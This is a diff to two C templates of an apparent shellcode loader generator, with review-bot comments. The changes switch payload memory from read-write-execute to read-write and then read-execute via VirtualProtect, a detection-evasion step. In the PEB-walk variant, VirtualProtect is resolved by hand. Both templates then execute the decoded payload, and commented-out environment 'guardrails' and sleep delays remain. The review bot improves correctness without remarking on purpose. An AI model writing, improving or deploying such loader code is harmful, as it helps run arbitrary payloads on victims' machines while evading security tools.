diff --git a/data/source/carrier/iat_reuse/template.c b/data/source/carrier/iat_reuse/template.c
index 44939c0..0a89701 100644
--- a/data/source/carrier/iat_reuse/template.c
+++ b/data/source/carrier/iat_reuse/template.c
@@ -21,8 +21,6 @@ int sleep_ms(DWORD sleeptime) {
 int main()
 {
-    //sleep_ms(10000);
-
     // Execution Guardrail: Env Check
     //wchar_t envVarName[] = {'U','S','E','R','P','R','O','F','I','L','E', 0};
     //wchar_t tocheck[] = {'C',':','\\','U','s','e','r','s','\\','h','a','c','k','e','r', 0}; // L"C:\\Users\\hacker"
@@ -39,13 +37,18 @@ int main()
     // Allocate 1
     // char *dest = ...
-    char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, 0x40);
+    char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, 0x04); // rw
+
+    //sleep_ms(10000);
     // Copy (and decode)
     // from: supermega_payload[]
     // to: dest[]
     {{ plugin_decoder }}
+    if (VirtualProtect(dest, {{PAYLOAD_LEN}}, 0x20, &result) == 0) { // rx
+        return 7;
+    }
     // Execute *dest
     (*(void(*)())(dest))();
diff --git a/data/source/carrier/peb_walk/template.c b/data/source/carrier/peb_walk/template.c
index 839e702..4829a3c 100644
--- a/data/source/carrier/peb_walk/template.c
+++ b/data/source/carrier/peb_walk/template.c
@@ -84,7 +84,9 @@ int main()
         _In_ DWORD flAllocationType,
         _In_ DWORD flProtect)) _GetProcAddress((HMODULE)base, VirtualAlloc_str);
     if (_VirtualAlloc == NULL) return 4;
-    char *dest = _VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, 0x40);
+    char *dest = _VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, 0x04); // rw
+
+    //sleep_ms(10000);
     // Copy
     // from: supermega_payload[]
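Review bot: The added rx line passes `&result` to VirtualProtect, but no declaration of `result` appears in the hunk; it must be a `DWORD` declared earlier in main() (the function starts before this hunk and its body continues after it), so confirm that declaration exists and has that type, because VirtualProtect writes the previous protection through that pointer and a differently-sized variable would be overrun. The `// rw` and `// rx` comments would be clearer if they named the constants the literals stand for, e.g. `// 0x04 == PAGE_READWRITE` and `// 0x20 == PAGE_EXECUTE_READ`, so a reader does not have to decode `0x04`, `0x20` and `0x3000` by hand.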
@@ -92,6 +94,21 @@ int main()
     // len: 0x11223344
     {{ plugin_decoder }}
+
+    // ntdll.dll: VirtualAlloc()
+    char VirtualProtect_str[] = { 'V','i','r','t','u','a','l','P','r','o','t','e', 'c', 't', 0 };
+    LPVOID (WINAPI * _VirtualProtect)(
+        _In_ LPVOID lpAddress,
+        _In_ SIZE_T dwSize,
+        _In_ DWORD flNewProtect,
+        _Out_ PDWORD lpflOldProtect) = (LPVOID (WINAPI*)(
+        _In_ LPVOID lpAddress,
+        _In_ SIZE_T dwSize,
+        _In_ DWORD flNewProtect,
+        _Out_ PDWORD lpflOldProtect)) _GetProcAddress((HMODULE)base, VirtualProtect_str);
+    if (_VirtualProtect == NULL) return 4;
+    _VirtualProtect(dest, {{PAYLOAD_LEN}}, 0x20, &result); // rx
+
     // Execute *dest
     (*(void(*)())(dest))();
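Review bot: The comment on the first added line, `// ntdll.dll: VirtualAlloc()`, is a stale copy from the VirtualAlloc block above and mislabels the code that resolves `VirtualProtect_str`; it should read `// VirtualProtect()`, and the module named should match whatever `base` was resolved from earlier in main(), which is outside this hunk, so I cannot confirm it is ntdll from here. The `_VirtualProtect` pointer is declared and cast as returning `LPVOID`, whereas VirtualProtect returns `BOOL`; because the call's result is discarded the mismatch has no runtime effect, but declaring it `BOOL (WINAPI * _VirtualProtect)(...)` and casting to the same type keeps the prototype honest and matches the check style used in the iat_reuse template. main() continues outside the hunk.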